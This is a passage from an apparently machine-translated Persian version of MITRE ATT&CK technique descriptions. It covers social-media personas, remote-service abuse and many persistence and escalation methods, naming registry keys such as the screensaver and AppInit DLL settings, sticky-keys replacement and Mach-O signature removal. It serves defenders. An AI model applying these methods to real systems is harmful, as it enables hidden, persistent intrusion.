ارائه‌دهندگان ایمیل باشد، که ممکن است مستقیماً برای فیشینگ برای اطلاعات یا فیشینگ استفاده شود.

دشمنان ممکن است حساب‌های رسانه‌های اجتماعی را ایجاد و پرورش دهند که می‌توانند در هنگام هدف‌گیری از آنها استفاده کنند. دشمنان می‌توانند حساب‌های رسانه‌های اجتماعی ایجاد کنند که می‌توانند برای ساختن شخصیت برای عملیات‌های بعدی استفاده شوند. توسعه شخصی شامل توسعه اطلاعات عمومی، حضور، سابقه و وابستگی های مناسب است. برای عملیاتی که شامل مهندسی اجتماعی می شود، استفاده از یک شخصیت در رسانه های اجتماعی ممکن است مهم باشد. این پرسوناها ممکن است ساختگی باشند و یا جعل هویت افراد واقعی باشند. پرسونا ممکن است در یک سایت رسانه اجتماعی یا در چندین سایت (مثلاً فیس بوک، لینکدین، توییتر و غیره) وجود داشته باشد. ایجاد یک پرسونا در رسانه های اجتماعی ممکن است مستلزم ایجاد اسناد اضافی برای واقعی به نظر رسیدن آنها باشد. این می‌تواند شامل پر کردن اطلاعات نمایه، توسعه شبکه‌های اجتماعی یا ترکیب عکس باشد. هنگامی که یک شخصیت ایجاد شد، یک دشمن می تواند از آن برای ایجاد ارتباط با اهداف مورد نظر استفاده کند. این ارتباطات ممکن است مستقیم باشد یا ممکن است شامل تلاش برای برقراری ارتباط از طریق دیگران باشد. این حساب‌ها ممکن است در مراحل دیگر چرخه حیات دشمن، مانند هنگام دسترسی اولیه (مثلاً Spearphishing از طریق سرویس) مورد استفاده قرار گیرند.

دشمنان ممکن است حساب‌های ایمیلی ایجاد کنند که می‌توانند در هنگام هدف‌گیری استفاده شوند. دشمنان می‌توانند از حساب‌های ایجاد شده با ارائه دهندگان ایمیل برای پیش‌برد عملیات خود استفاده کنند، مانند اعمال نفوذ آنها برای انجام فیشینگ برای اطلاعات یا فیشینگ. همچنین ممکن است دشمنان برای پرورش یک شخصیت در اطراف حساب ایمیل، مانند استفاده از حساب‌های رسانه‌های اجتماعی، اقداماتی انجام دهند تا شانس موفقیت رفتارهای بعدی را افزایش دهند. حساب‌های ایمیل ایجاد شده همچنین می‌توانند در دستیابی به زیرساخت‌ها (مثلاً دامنه‌ها) استفاده شوند. برای کاهش احتمال بازگرداندن فیزیکی عملیات به خود، دشمنان ممکن است از خدمات ایمیل یکبار مصرف استفاده کنند.

ممکن است دشمنان با استفاده از نرم‌افزار، داده‌ها یا دستورات از ضعف رایانه یا برنامه‌ای که در اینترنت قرار دارد استفاده کنند تا رفتار ناخواسته یا پیش‌بینی نشده‌ای ایجاد کنند. ضعف در سیستم می تواند یک اشکال، یک نقص یا یک آسیب پذیری طراحی باشد. این برنامه‌ها اغلب وب‌سایت‌ها هستند، اما می‌توانند شامل پایگاه‌های داده مانند ( SQL)، خدمات استاندارد مانند SMB یا SSH، پروتکل‌های مدیریت و مدیریت دستگاه شبکه مانند SNMP و Smart Install باشند. و سایر برنامه‌های کاربردی با سوکت‌های باز قابل دسترسی به اینترنت، مانند سرورهای وب و خدمات مرتبط. بسته به نقصی که مورد بهره برداری قرار می گیرد، ممکن است شامل بهره برداری برای فرار از دفاع باشد. اگر یک برنامه بر روی زیرساخت مبتنی بر ابر میزبانی شود و یا کانتینری باشد، سوء استفاده از آن ممکن است منجر به به خطر افتادن نمونه یا کانتینر اصلی شود. این می‌تواند به دشمن امکان دسترسی به APIهای ابری یا کانتینری را بدهد، از دسترسی میزبان کانتینر از طریق Escape به Host سوء استفاده کند یا از سیاست‌های ضعیف هویت و مدیریت دسترسی استفاده کند.

دشمنان ممکن است از خدمات راه دور خارجی برای دسترسی اولیه و یا تداوم در یک شبکه استفاده کنند. سرویس‌های راه دور مانند VPN، Citrix و سایر مکانیسم‌های دسترسی به کاربران اجازه می‌دهند تا از مکان‌های خارجی به منابع شبکه داخلی سازمانی متصل شوند. اغلب دروازه های خدمات راه دور وجود دارند که اتصالات و احراز هویت اعتبار این سرویس ها را مدیریت می کنند. خدماتی مانند Windows Remote Management و VNC نیز می توانند به صورت خارجی استفاده شوند. دسترسی به حساب‌های معتبر برای استفاده از این سرویس اغلب یک الزام است، که می‌توان آن را از طریق اعتبارسنجی فارمینگ یا با دریافت اعتبار از کاربران پس از به خطر انداختن شبکه سازمانی به دست آورد. دسترسی به خدمات از راه دور ممکن است به عنوان یک مکانیسم دسترسی اضافی یا مداوم در طول یک عملیات استفاده شود. همچنین ممکن است از طریق یک سرویس در معرض دید که نیازی به احراز هویت ندارد، دسترسی حاصل شود. در محیط‌های کانتینری، این ممکن است شامل یک Docker API در معرض، سرور Kubernetes API، kubelet یا برنامه وب مانند داشبورد Kubernetes باشد.

دشمنان ممکن است از آسیب‌پذیری‌های نرم‌افزار در برنامه‌های مشتری برای اجرای کد سوء‌استفاده کنند. آسیب‌پذیری‌ها می‌توانند در نرم‌افزار به دلیل شیوه‌های کدگذاری ناامن وجود داشته باشند که می‌توانند منجر به رفتارهای پیش‌بینی نشده شوند. دشمنان می توانند از طریق بهره برداری هدفمند به منظور اجرای کد دلخواه از آسیب پذیری های خاص استفاده کنند. اغلب اوقات با ارزش ترین سوء استفاده ها برای یک جعبه ابزار تهاجمی آنهایی هستند که می توان از آنها برای به دست آوردن اجرای کد در یک سیستم راه دور استفاده کرد زیرا می توان از آنها برای دسترسی به آن سیستم استفاده کرد. کاربران انتظار دارند فایل‌های مربوط به برنامه‌هایی را که معمولاً برای انجام کار استفاده می‌کنند، ببینند، بنابراین به دلیل کاربرد زیاد، هدف مفیدی برای تحقیق و توسعه بهره‌برداری هستند.

دشمنان ممکن است با استفاده از مکانیسم‌های سیستمی که بر اساس رویدادهای خاص اجرا را آغاز می‌کنند، تداوم و/یا امتیازات را افزایش دهند. سیستم عامل های مختلف ابزارهایی برای نظارت و اشتراک در رویدادهایی مانند ورود به سیستم یا سایر فعالیت های کاربر مانند اجرای برنامه های کاربردی خاص / باینری دارند. دشمنان ممکن است از این مکانیسم ها به عنوان وسیله ای برای حفظ دسترسی دائمی به قربانی از طریق اجرای مکرر کد مخرب سوء استفاده کنند. پس از دسترسی به سیستم قربانی، دشمنان ممکن است محرک های رویداد را ایجاد/تغییر دهند تا به محتوای مخرب اشاره کنند که هر زمان که ماشه رویداد فراخوانی شود اجرا می شود. از آنجایی که اجرا می‌تواند توسط یک حساب با مجوزهای بالاتر، مانند حساب‌های SYSTEM یا سرویس، پروکسی شود، ممکن است یک دشمن بتواند از این مکانیسم‌های اجرایی راه‌اندازی شده برای افزایش امتیازات خود سوء استفاده کند.

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط یک ارتباط نوع فایل، پایداری را ایجاد کنند. هنگامی که یک فایل باز می شود، برنامه پیش فرض مورد استفاده برای باز کردن فایل (همچنین به آن ارتباط یا کنترل کننده فایل نیز گفته می شود) بررسی می شود. انتخاب‌های مرتبط فایل در رجیستری ویندوز ذخیره می‌شوند و می‌توانند توسط کاربران، مدیران، یا برنامه‌هایی که به رجیستری دسترسی دارند یا توسط مدیران با استفاده از ابزار داخلی assoc ویرایش شوند. برنامه‌ها می‌توانند ارتباط فایل را برای پسوند فایل معین تغییر دهند تا زمانی که فایلی با پسوند معین باز می‌شود، یک برنامه دلخواه را فراخوانی کند.

دشمنان ممکن است با اجرای محتوای مخرب ناشی از عدم فعالیت کاربر تداوم داشته باشند. محافظ‌های صفحه برنامه‌هایی هستند که پس از یک زمان قابل تنظیم از عدم فعالیت کاربر اجرا می‌شوند و از فایل‌های اجرایی قابل حمل ( PE) با پسوند فایل scr. تشکیل شده‌اند. برنامه محافظ صفحه نمایشC:\Windows\System32\ در و C:\Windows\sysWOW64\ در سیستم‌های ویندوز 64 بیتی به همراه محافظ‌های صفحه همراه با نصب پایه ویندوز قرار دارد. تنظیمات محافظ صفحه زیر در رجیستری HKCU\Control Panel\Desktop\ذخیره می‌شوند و می‌توانند برای دستیابی به پایداری دستکاری شوند: SCRNSAVE.exe - روی مسیر PE مخرب تنظیم شده است. ScreenSaveActive - برای فعال کردن محافظ صفحه روی "1" تنظیم کنید. ScreenSaverIsSecure - روی '0' تنظیم کنید تا برای باز کردن قفل نیازی به رمز عبور نباشد. ScreenSaveTimeout - زمان عدم فعالیت کاربر را قبل از اجرای محافظ صفحه تنظیم می کند. دشمنان می توانند با تنظیم محافظ صفحه برای اجرای بدافزار پس از بازه زمانی مشخصی از عدم فعالیت کاربر، از تنظیمات محافظ صفحه برای حفظ پایداری استفاده کنند.

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط اشتراک رویداد (WMI) تداوم داشته باشند و امتیازات را افزایش دهند. WMI را می توان برای نصب فیلترهای رویداد، ارائه دهندگان، مصرف کنندگان و اتصالاتی که در هنگام وقوع یک رویداد تعریف شده کد را اجرا می کنند، استفاده کرد. نمونه‌هایی از رویدادهایی که ممکن است مشترک آنها باشند عبارتند از: زمان ساعت دیواری، ورود کاربر، یا زمان فعال بودن رایانه. دشمنان ممکن است از قابلیت‌های WMI برای اشتراک در یک رویداد و اجرای کد دلخواه در هنگام وقوع آن رویداد استفاده کنند و پایداری در یک سیستم را فراهم کنند. دشمنان همچنین ممکن است اسکریپت‌های WMI را در فایل‌های Windows Management Object (MOF) پسوندmof. که می‌تواند برای ایجاد اشتراک مخرب استفاده شود، کامپایل کنند. اجرای اشتراک WMI توسط فرآیند میزبان ارائه دهنده WMI (WmiPrvSe.exe) پروکسی می شود و بنابراین ممکن است منجر به افزایش امتیازات SYSTEM شود.

دشمنان ممکن است از طریق اجرای دستورات مخربی که توسط پوسته کاربر راه اندازی می شوند، پایداری را ایجاد کنند. پوسته های یونیکس کاربر چندین اسکریپت پیکربندی را در نقاط مختلف در طول جلسه بر اساس رویدادها اجرا می کنند. به عنوان مثال، هنگامی که یک کاربر یک رابط خط فرمان را باز می کند یا از راه دور وارد سیستم می شود (مانند از طریق ( SSH)) ، پوسته ورود شروع می شود. پوسته ورود، اسکریپت‌ها را از سیستم (/etc) و فهرست اصلی کاربر (~/) برای پیکربندی محیط اجرا می‌کند. همه پوسته های ورود به سیستم در هنگام راه اندازی از /etc/profile استفاده می کنند. این اسکریپت های پیکربندی در سطح مجوز دایرکتوری خود اجرا می شوند و اغلب برای تنظیم متغیرهای محیطی، ایجاد نام مستعار و سفارشی کردن محیط کاربر استفاده می شوند. هنگامی که پوسته خارج می شود یا خاتمه می یابد، اسکریپت های پوسته اضافی برای اطمینان از خروج مناسب پوسته اجرا می شوند. دشمنان ممکن است با قرار دادن دستورات در اسکریپت‌هایی که به‌طور خودکار توسط شل اجرا می‌شوند، تلاش کنند پایداری را ایجاد کنند.

دشمنان ممکن است با اجرای محتوای مخربی که توسط یک سیگنال وقفه ایجاد می شود، پایداری را ایجاد کنند. دستور trap به برنامه ها و پوسته ها اجازه می دهد تا دستوراتی را که با دریافت سیگنال های وقفه اجرا می شوند را مشخص کنند. یک موقعیت رایج، اسکریپتی است که امکان خاتمه و مدیریت وقفه های معمول صفحه کلید مانند ctrl+c و ctrl+d را فراهم می کند. دشمنان می توانند از این برای ثبت کد استفاده کنند تا زمانی که پوسته با وقفه های خاصی به عنوان مکانیزم پایداری مواجه می شود، اجرا شود. دستورات Trap از فرمت‌های زیر سیگنال‌های «فهرست فرمان» هستند که «فهرست فرمان» در هنگام دریافت «سیگنال‌ها» اجرا می‌شود.

دشمنان ممکن است با اجرای محتوای مخربی که توسط اجرای باینری های آلوده ایجاد می شود، تداوم داشته باشند. باینری های Mach-O دارای یک سری هدر هستند که برای انجام عملیات خاصی در هنگام بارگذاری یک باینری استفاده می شوند. هدر LC_LOAD_DYLIB در یک باینری Mach-O به macOS و OS X می گوید که کدام کتابخانه های پویا ( dylibs) را در طول زمان اجرا بارگیری کنند. تا زمانی که تنظیمات مربوط به بقیه فیلدها و وابستگی ها انجام شود، می توان این موارد را به صورت موقت به باینری کامپایل شده اضافه کرد. ابزارهای موجود برای انجام این تغییرات وجود دارد. دشمنان ممکن است هدرهای باینری Mach-O را تغییر دهند تا هر بار که باینری اجرا می شود، dylib های مخرب را بارگیری و اجرا کنند. اگرچه هر تغییری امضاهای دیجیتال روی باینری ها را باطل می کند، زیرا باینری در حال تغییر است، اما می توان به سادگی با حذف دستور LC_CODE_SIGNATURE از باینری، آن را اصلاح کرد تا امضا در زمان بارگذاری بررسی نشود.

دشمنان ممکن است با اجرای محتوای مخربی که توسط DLL های Netsh Helper راه اندازی شده است، پایداری را ایجاد کنند. Netsh.exe (همچنین به عنوان Netshell شناخته می شود) یک ابزار برنامه نویسی خط فرمان است که برای تعامل با پیکربندی شبکه یک سیستم استفاده می شود. این شامل قابلیت افزودن DLL های کمکی برای گسترش عملکرد ابزار است. مسیرهای DLL های کمکی netsh.exe ثبت شده در رجیستری ویندوز در HKLM\SOFTWARE\Microsoft\Netsh. وارد می شوند. دشمنان می توانند از DLL های کمکی netsh.exe برای شروع اجرای کد دلخواه به صورت مداوم استفاده کنند. این اجرا در هر زمانی که netsh.exe اجرا می‌شود انجام می‌شود، که می‌تواند به‌طور خودکار، با تکنیک تداوم دیگری، یا اگر نرم‌افزار دیگری (مثلاً VPN )در سیستم وجود داشته باشد که netsh.exe را به عنوان بخشی از عملکرد عادی آن اجرا می‌کند، انجام شود.

دشمنان ممکن است با اجرای محتوای مخرب ناشی از ویژگی‌های دسترسی، تداوم و/یا امتیازات را افزایش دهند. Windows دارای ویژگی‌های دسترس‌پذیری است که ممکن است قبل از ورود کاربر با یک کلید ترکیبی راه‌اندازی شوند (مثلاً زمانی که کاربر در صفحه ورود به سیستم ویندوز است). یک حریف می‌تواند نحوه راه‌اندازی این برنامه‌ها را برای دریافت یک خط فرمان یا درب پشتی بدون ورود به سیستم تغییر دهد. دو برنامه دسترسی رایج عبارتند از C:\Windows\System32\sethc.exe که با فشار دادن کلید shift پنج بار راه اندازی می شود و C:\Windows\System32\utilman.exe که با فشار دادن کلید ترکیبی Windows + U راه اندازی می شود. برنامه sethc.exe اغلب به عنوان "کلیدهای چسبنده" نامیده می شود و توسط دشمنان برای دسترسی غیرقانونی از طریق صفحه ورود به سیستم دسکتاپ راه دور استفاده شده است. بسته به نسخه ویندوز، حریف ممکن است به طرق مختلف از این ویژگی ها استفاده کند. روش‌های رایج مورد استفاده توسط دشمنان شامل جایگزینی باینری‌های ویژگی دسترسی یا اشاره‌گر ارجاع به این باینری‌ها در رجیستری است.

دشمنان ممکن است با اجرای محتوای مخربی که توسط DLL های AppCert بارگذاری شده در فرآیندها ایجاد می شود، تداوم و یا امتیازات را افزایش دهند. کتابخانه‌های پیوند پویا ( DLLs) که در کلید رجیستری AppCertDLLs در زیر HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\ مشخص شده‌اند در هر فرآیندی بارگیری می‌شوند که توابع برنامه‌نویسی برنامه‌نویسی کاربردی ( API) را فراخوانی می‌کند که همه جا توابع برنامه‌نویسی برنامه‌نویسی کاربردی ( API) را فراخوانی می‌کند. CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec از این مقدار می توان برای به دست آوردن امتیازات بالا با بارگیری و اجرای یک DLL مخرب در چارچوب فرآیندهای جداگانه در رایانه سوء استفاده کرد. DLL های مخرب AppCert همچنین ممکن است با فعال شدن مداوم توسط فعالیت API پایداری ایجاد کنند.

دشمنان ممکن است با اجرای محتوای مخربی که توسط DLL های AppInit بارگذاری شده در فرآیندها ایجاد می شود، تداوم و/یا امتیازات را افزایش دهند. کتابخانه‌های پیوند پویا (DLL) که در مقدار AppInit_DLLs در کلیدهای رجیستری زیر مشخص شده‌اند. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows dll را در هر فرآیندی که user32.dll بارگیری می کند، وارد کنید. در عمل این تقریباً همه برنامه ها است، زیرا user32.dll یک کتابخانه بسیار رایج است. مشابه Process Injection، این مقادیر را می توان برای به دست آوردن امتیازات بالا از طریق بارگیری و اجرای یک DLLمخرب در چارچوب فرآیندهای جداگانه در رایانه مورد سوء استفاده قرار داد. DLLهای مخرب AppInit همچنین ممکن است با فعال شدن مداوم توسط فعالیت API پایداری ایجاد کنند. عملکرد AppInit DLL در ویندوز 8 و نسخه‌های بعدی با فعال بودن راه‌اندازی امن غیرفعال می‌شود.

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط شیم های برنامه، تداوم و/یا امتیازات را افزایش دهند. زیرساخت / چارچوب سازگاری برنامه مایکروسافت ویندوز ( Application Shim) ایجاد شد تا با تغییر پایگاه کد سیستم عامل در طول زمان، امکان سازگاری با نرم افزار را فراهم کند. به عنوان مثال، ویژگی شیمینگ برنامه به توسعه دهندگان این امکان را می دهد تا برای برنامه های کاربردی (بدون بازنویسی کد) که برای ویندوز XP ایجاد شده اند، اصلاحاتی را اعمال کنند تا با ویندوز 10 کار کند. در چارچوب، شیم ها ایجاد می شوند تا به عنوان یک بافر بین برنامه (یا به طور خاص تر، جدول آدرس ورودی) و سیستم عامل ویندوز عمل کنند. هنگامی که یک برنامه اجرا می شود، به حافظه نهان شیم ارجاع داده می شود تا مشخص شود آیا برنامه به استفاده از پایگاه داده شیم (.sdb). نیاز دارد یا خیر. اگر چنین است، پایگاه داده شیم از hooking برای تغییر مسیر کد در صورت لزوم به منظور برقراری ارتباط با سیستم عامل استفاده می کند.

دشمنان ممکن است با اجرای محتوای مخربی که توسط اشکال‌زدایی‌کننده‌های Image File Execution Options (IFEO) راه‌اندازی می‌شوند، تداوم داشته باشند و یا امتیازات را افزایش دهند. IFEO ها توسعه دهنده را قادر می سازند تا یک دیباگر را به یک برنامه متصل کند. هنگامی که یک فرآیند ایجاد می‌شود، یک اشکال‌زدای موجود در برنامه IFEO به نام برنامه اضافه می‌شود و عملاً فرآیند جدید را در زیر اشکال‌زدا راه‌اندازی می‌کند. IFEOها را می توان مستقیماً از طریق رجیستری یا در پرچم های جهانی از طریق ابزار GFlags تنظیم کرد. IFEO ها همچنین می توانند یک برنامه نظارتی دلخواه را فعال کنند تا زمانی که یک برنامه مشخص به صورت بی صدا خارج می شود (یعنی به خودی خود به طور پیش از موعد متوقف می شود یا یک فرآیند دوم غیر هسته‌ای). مشابه اشکال‌زداها، نظارت بر خروج بی‌صدا را می‌توان از طریق GFlags و یا با تغییر مستقیم مقادیر رجیستری خروجی IFEO.

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط نمایه‌های PowerShell، تداوم داشته باشند و امتیازات را افزایش دهند. نمایه (profile.ps1) اسکریپتی است که هنگام شروع PowerShell اجرا می شود و می تواند به عنوان یک اسکریپت ورود به سیستم برای سفارشی کردن محیط های کاربر استفاده شود. PowerShell از چندین پروفایل بسته به کاربر یا برنامه میزبان پشتیبانی می کند. به عنوان مثال، می تواند پروفایل های مختلفی برای برنامه های میزبان PowerShell مانند کنسول PowerShell، PowerShell ISE یا Visual Studio Code وجود داشته باشد. یک مدیر همچنین می‌تواند نمایه‌ای را پیکربندی کند که برای همه کاربران و برنامه‌های میزبان در رایانه محلی اعمال شود. دشمنان ممکن است این نمایه‌ها را طوری تغییر دهند که شامل دستورات، توابع، ماژول‌ها و/یا درایوهای PowerShell دلخواه باشد تا پایداری داشته باشند. هر بار که کاربر یک جلسه PowerShell را باز می کند، اسکریپت اصلاح شده اجرا می شود مگر اینکه هنگام راه اندازی از پرچم -NoProfile استفاده شود. اگر یک اسکریپت در یک نمایه PowerShell توسط حسابی با امتیازات بالاتر، مانند یک سرپرست دامنه، بارگیری و اجرا شود، یک دشمن ممکن است بتواند امتیازات را افزایش دهد.

دشمنان ممکن است با اجرای محتوای مخربی که توسط Daemon مانیتور رویداد ( emond) راه اندازی شده است، پایداری و امتیازات را افزایش دهند. Emond یک Launch Daemon است که رویدادها را از سرویس های مختلف می پذیرد، آنها را از طریق یک موتور قوانین ساده اجرا می کند و اقدام می کند. emond باینری در /sbin/emond هر قاعده‌ای را از فهرست /etc/emond.d/rules/ بارگیری می‌کند و پس از وقوع یک رویداد مشخص، اقدام می‌کند. فایل های قانون در قالب plist هستند و نام، نوع رویداد و اقدامی که باید انجام شود را تعریف می کنند. برخی از نمونه‌های انواع رویداد شامل راه‌اندازی سیستم و احراز هویت کاربر است. نمونه هایی از اقدامات عبارتند از اجرای فرمان سیستم یا ارسال ایمیل. اگر فایلی در مسیر /private/var/db/emondClients که در فایل پیکربندی Launch Daemon در//System/Library/LaunchDaemons/com.apple.emond.plist مشخص شده است، وجود نداشته باشد، سرویس emond راه اندازی نمی شود. دشمنان ممکن است با نوشتن یک قانون برای اجرای دستورات زمانی که یک رویداد تعریف شده رخ می دهد، از این سرویس سوء استفاده کنند، مانند راه اندازی سیستم یا تأیید اعتبار کاربر. دشمنان همچنین ممکن است بتوانند امتیازات را از مدیر به روت افزایش دهند زیرا سرویس emond با امتیازات ریشه توسط سرویس Launch Daemon اجرا می شود.

دشمنان ممکن است با اجرای محتوای مخرب ایجاد شده توسط ارجاعات ربوده شده به اشیاء مدل شیء مؤلفه ( COM)پایداری را ایجاد کنند. COM یک سیستم در ویندوز برای فعال کردن تعامل بین اجزای نرم افزار از طریق سیستم عامل است. ارجاع به اشیاء مختلف COM در رجیستری ذخیره می شود. دشمنان می توانند از سیستم COM برای درج کد مخربی استفاده کنند که می تواند به جای نرم افزار قانونی از طریق ربودن مراجع و روابط COM به عنوان وسیله ای برای تداوم اجرا شود. ربودن یک شی COM نیاز به تغییر در رجیستری دارد تا مرجعی به یک جزء قانونی سیستم جایگزین شود که ممکن است باعث شود آن جزء هنگام اجرا کار نکند. هنگامی که آن جزء سیستم از طریق عملیات عادی سیستم اجرا می شود، کد حریف به جای آن اجرا می شود. یک دشمن احتمالاً اجسامی را می رباید که به قدر کافی استفاده می شوند تا سطح پایداری ثابتی داشته باشند، اما بعید است که عملکرد قابل توجهی را در سیستم خراب کند تا از بی ثباتی سیستم که می تواند منجر به شناسایی شود جلوگیری کند.

دشمنان ممکن است از خدمات راه دور خارجی استفاده کنند تا در ابتدا به شبکه دسترسی پیدا کنند و/یا ادامه پیدا کنند. سرویس‌های راه دور مانند VPN، Citrix و سایر مکانیسم‌های دسترسی به کاربران اجازه می‌دهند تا از مکان‌های خارجی به منابع شبکه داخلی سازمانی متصل شوند. اغلب دروازه‌های سرویس راه دور وجود دارند که اتصالات و تأیید اعتبار را برای این سرویس‌ها مدیریت می‌کنند. خدماتی مانند Windows Remote Management و VNC نیز می توانند به صورت خارجی استفاده شوند. دسترسی به حساب‌های معتبر برای استفاده از این سرویس اغلب یک الزام است، که می‌توان آن را از طریق credential pharming یا با گرفتن اعتبار از کاربران پس از به خطر انداختن شبکه سازمانی به دست آورد. دسترسی به خدمات از راه دور ممکن است به عنوان یک مکانیسم دسترسی اضافی یا دائمی در طول یک عملیات استفاده شود. همچنین ممکن است از طریق یک سرویس در معرض دید که نیازی به احراز هویت ندارد، دسترسی حاصل شود. در محیط‌های کانتینری، این ممکن است شامل یک Docker API، سرور Kubernetes API، kubelet، یا برنامه وب مانند داشبورد Kubernetes باشد.

ماتریس سازمانی همه تاکتیک‌ها، تکنیک‌ها اصلی و تکنیک‌های فرعی را برای همه پلتفرم‌ها پوشش می‌دهد. با این حال، MITER همچنین ماتریس‌های مخصوص پلتفرم را ارائه می‌کند که زیرمجموعه تاکتیک‌ها، تکنیک‌های اصلی و تکنیک‌های فرعی را که برای یک پلتفرم خاص قابل اجرا هستند، برجسته می‌کند.

دشمنان ممکن است از حفاظ‌های اجرایی برای محدود کردن اجرا یا اقداماتی بر اساس شرایط خاص دشمن و محیطی که انتظار می‌رود روی هدف وجود داشته باشد، استفاده کنند. گاردریل‌ها تضمین می‌کنند که یک محموله فقط در برابر هدف مورد نظر اجرا می‌شود و آسیب‌های جانبی ناشی از کمپین دشمن را کاهش می‌دهد. مقادیری که یک دشمن می‌تواند در مورد یک سیستم یا محیط هدف برای استفاده به عنوان نرده‌های محافظ ارائه دهد، ممکن است شامل نام‌های اشتراک شبکه خاص، دستگاه‌های فیزیکی متصل، فایل‌ها، دامنه‌های پیوسته Active Directory (AD) و آدرس‌های IP محلی/خارجی باشد. نرده‌های محافظ می‌توانند برای جلوگیری از قرار گرفتن در معرض قابلیت‌ها در محیط‌هایی که قرار نیست در معرض خطر قرار گیرند یا در داخل آنها کار کنند، استفاده شوند. این استفاده از نرده‌های محافظ با Virtualization/Sandbox Evasion معمولی متمایز است. در حالی که استفاده از Virtualization/Sandbox Evasion ممکن است شامل بررسی مقادیر شناخته شده sandbox و ادامه اجرا فقط در صورت عدم تطابق باشد، استفاده از گاردریل مستلزم بررسی مقدار مورد انتظار برای هدف خاص است و فقط در صورت وجود چنین تطابقی، اجرا را ادامه می‌دهد.

دشمنان ممکن است از آسیب پذیری سیستم یا برنامه برای دور زدن ویژگی های امنیتی سوء استفاده کنند. سوء استفاده از آسیب‌پذیری نرم‌افزار زمانی اتفاق می‌افتد که دشمن از یک خطای برنامه‌نویسی در یک برنامه، سرویس یا درون نرم‌افزار سیستم عامل یا هسته خود برای اجرای کدهای کنترل‌شده توسط دشمن استفاده کند. آسیب‌پذیری‌ها ممکن است در نرم‌افزار امنیتی دفاعی وجود داشته باشد که می‌توان از آنها برای غیرفعال کردن یا دور زدن آنها استفاده کرد. ممکن است دشمنان از طریق شناسایی از وجود نرم‌افزار امنیتی در یک محیط اطلاعات قبلی داشته باشند یا ممکن است در طول یا مدت کوتاهی پس از در معرض خطر قرار گرفتن سیستم برای کشف نرم‌افزار امنیتی، بررسی‌هایی را انجام دهند. نرم افزار امنیتی احتمالاً مستقیماً برای بهره برداری هدف قرار خواهد گرفت. نمونه‌هایی از نرم‌افزارهای آنتی‌ویروس وجود دارد که توسط گروه‌های تهدیدکننده دائمی برای جلوگیری از شناسایی هدف قرار می‌گیرند.

دشمنان ممکن است از آسیب‌پذیری‌های نرم‌افزار در تلاش برای جمع آوری اعتبار سوء استفاده کنند. سوء استفاده از آسیب‌پذیری نرم‌افزار زمانی اتفاق می‌افتد که دشمن از یک خطای برنامه‌نویسی در یک برنامه، سرویس یا درون نرم‌افزار سیستم عامل یا هسته خود برای اجرای کدهای کنترل‌شده توسط دشمن استفاده کند. مکانیسم های اعتبارسنجی و احراز هویت ممکن است برای بهره برداری توسط دشمنان به عنوان وسیله ای برای دستیابی به اعتبارنامه های مفید یا دور زدن فرآیند برای دسترسی به سیستم ها مورد هدف قرار گیرند. یکی از نمونه‌های آن MS14-068 است که Kerberos را هدف قرار می‌دهد و می‌تواند برای جعل بلیط‌های Kerberos با استفاده از مجوزهای کاربر دامنه استفاده شود. بهره برداری برای دسترسی به اعتبار نیز ممکن است منجر به افزایش امتیاز بسته به فرآیند مورد نظر یا اعتبار به دست آمده شود.

دشمنان ممکن است از سرویس های راه دور برای دسترسی غیرمجاز به سیستم های داخلی یک بار در یک شبکه سوء استفاده کنند. سوء استفاده از آسیب‌پذیری نرم‌افزار زمانی اتفاق می‌افتد که دشمن از یک خطای برنامه‌نویسی در یک برنامه، سرویس یا درون نرم‌افزار سیستم عامل یا هسته خود برای اجرای کدهای کنترل‌شده توسط دشمن استفاده کند. یک هدف مشترک برای بهره برداری پس از سازش خدمات از راه دور، حرکت جانبی برای امکان دسترسی به یک سیستم راه دور است. یک دشمن ممکن است نیاز داشته باشد که آیا سیستم راه دور در یک وضعیت آسیب پذیر است یا خیر، که ممکن است از طریق اسکن سرویس شبکه یا سایر روش های کشف به دنبال نرم افزار رایج و آسیب پذیری که ممکن است در شبکه مستقر شده باشد، انجام شود، عدم وجود وصله های خاص که ممکن است نشان دهنده آن باشد. آسیب‌پذیری‌ها یا نرم‌افزار امنیتی که ممکن است برای شناسایی یا مهار بهره‌برداری از راه دور استفاده شود. سرورها احتمالاً یک هدف با ارزش برای بهره برداری از حرکت جانبی هستند، اما سیستم های نقطه پایانی نیز در صورت ایجاد مزیت یا دسترسی به منابع اضافی ممکن است در معرض خطر باشند. چندین آسیب‌پذیری شناخته شده در سرویس‌های رایج مانند SMB وRDP و همچنین برنامه‌هایی که ممکن است در شبکه‌های داخلی مانند MySQLو سرویس‌های وب سرور استفاده شوند، وجود دارد. بسته به سطح مجوزهای سرویس راه دور آسیب پذیر، یک دشمن ممکن است به بهره برداری برای افزایش امتیاز در نتیجه بهره برداری از حرکت جانبی نیز دست یابد.

ممکن است دشمنان ایمیل کاربر را برای جمع آوری اطلاعات حساس مورد هدف قرار دهند. ایمیل ها ممکن است حاوی داده های حساس، از جمله اسرار تجاری یا اطلاعات شخصی باشد که می تواند برای دشمنان ارزشمند باشد. دشمنان می توانند ایمیل را از سرورهای پست الکترونیکی یا مشتریان جمع آوری یا ارسال کنند.

دشمنان ممکن است از یک الگوریتم رمزگذاری شناخته شده برای پنهان کردن فرمان و کنترل ترافیک به جای اتکا به هرگونه حفاظت ذاتی ارائه شده توسط یک پروتکل ارتباطی استفاده کنند. با وجود استفاده از یک الگوریتم ایمن، اگر کلیدهای مخفی در نمونه‌های بدافزار/فایل‌های پیکربندی کدگذاری شده و/یا تولید شوند، ممکن است این پیاده‌سازی‌ها در مقابل مهندسی معکوس آسیب‌پذیر باشند.

